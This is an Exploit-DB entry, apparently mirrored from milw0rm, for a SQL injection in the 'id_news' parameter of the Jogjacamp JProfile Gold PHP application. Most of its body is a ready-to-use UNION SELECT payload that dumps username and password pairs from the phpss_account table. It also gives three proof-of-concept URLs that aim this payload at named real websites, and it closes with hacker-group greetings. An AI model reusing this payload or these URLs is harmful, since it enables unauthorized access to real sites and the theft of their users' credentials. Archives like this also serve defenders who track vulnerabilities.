Jogjacamp JProfile Gold - 'id_news' SQL Injection

EDB-ID:

8151

CVE:

EDB Verified:

Author:

kecemplungkalen

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2009-03-03

Vulnerable App:

###############################################################

     __                                                   
    |__|__ ________   ____     ___________   ______  _  __
    |  |  |  \____ \_/ __ \  _/ ___\_  __ \_/ __ \ \/ \/ /
    |  |  |  /  |_> >  ___/  \  \___|  | \/\  ___/\     / 
/\__|  |____/|   __/ \___  >  \___  >__|    \___  >\/\_/  
\______|     |__|        \/       \/            \/        



###############################################################


Jogjacamp JProfile Gold SQL Injection

by kecemplungkalen 

Vendor  : http://jogjacamp.com

bugs	: /index.php?action=news.detail&id_news=

exploit : union select concat(username,0x3a,password),2,3 from phpss_account--

POC	: http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

	  http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

	  http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20--

###############################################################

greetz	: Allah
	  s3t4n and Paman aka Jack-
	  my family
	  and all Mainhack BrotherHood 
	  jupe crew jangan ngegame melulu :p

# milw0rm.com [2009-03-03]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services